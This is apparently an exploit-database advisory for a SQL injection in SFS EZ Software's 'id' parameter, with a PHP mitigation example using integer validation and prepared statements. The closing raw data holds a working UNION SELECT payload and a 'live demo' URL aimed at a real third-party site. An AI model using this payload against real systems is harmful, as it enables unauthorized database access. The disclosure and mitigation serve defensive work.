Vendor: SFS EZ Software
By: x0r
CVSS: 7.5 (HIGH)
Vulnerability Type: SQL Injection
CWE: 89
Product Name: SFS EZ Software
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:sfs_ez_software:sfs_ez_software
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

SFS EZ Software SQL Injection Vulnerability

An SQL injection vulnerability exists in SFS EZ Software. The 'id' parameter of the 'software-description.php' script is not sufficiently validated before it is used in a database query, so a specially crafted HTTP request with a malicious 'id' value causes the application to execute attacker-supplied SQL and return the results to the attacker. An attacker can use this to access, modify, or delete sensitive data in the database.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in SQL queries.
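The following PHP snippet is an added illustration of that mitigation; it is not code from SFS EZ Software. It places the unsafe pattern the advisory describes (the raw 'id' value concatenated into the query text) beside a hardened version that validates 'id' as a positive integer and binds it as a typed parameter of a prepared statement. The table name `software`, its column names, and the DSN and credentials are assumptions.

```php
<?php
// Added example for the mitigation above; not the vendor's code.
// Table `software` and its columns are assumed; DSN/credentials are placeholders.

// BEFORE (the pattern the advisory describes): the request value is spliced into
// the SQL text, so anything after a number (e.g. " union all select ...") is parsed
// by the database as SQL instead of being treated as the id to look up.
function lookup_vulnerable(PDO $pdo, array $get): ?array {
    $sql = "SELECT * FROM software WHERE id = " . $get['id'];   // unsafe concatenation
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Step 1 of the fix: accept only a positive integer. filter_var() returns false
// for values such as "-5 union all select ...", "5 OR 1=1", "5.0" or "".
function validate_id(mixed $raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Step 2 of the fix: even with a validated integer, pass it as a bound parameter
// so the value never becomes part of the query text.
function lookup_safe(PDO $pdo, array $get): ?array {
    $id = validate_id($get['id'] ?? null);
    if ($id === null) {
        http_response_code(400);   // reject the request instead of querying
        return null;
    }
    $stmt = $pdo->prepare('SELECT id, name, description FROM software WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage (placeholder DSN and credentials):
// $pdo = new PDO(
//     'mysql:host=localhost;dbname=PLACEHOLDER_DB',
//     'PLACEHOLDER_USER',
//     'PLACEHOLDER_PASS',
//     [
//         PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
//         PDO::ATTR_EMULATE_PREPARES => false,   // real server-side prepared statements
//     ]
// );
// $row = lookup_safe($pdo, $_GET);
```

Disabling `PDO::ATTR_EMULATE_PREPARES` makes the MySQL driver send the statement and its parameters separately rather than interpolating an escaped value client-side; combined with the integer check, the 'id' value can only ever reach the database as a number.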

Exploit-DB raw data:

-=====================================-
Application : SFS EZ Software
Risk : High
Found By: x0r
-=====================================-

Exploit: software/software-description.php?id=-5 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

Live Demo:
http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

-=EOF=-

# milw0rm.com [2008-10-31]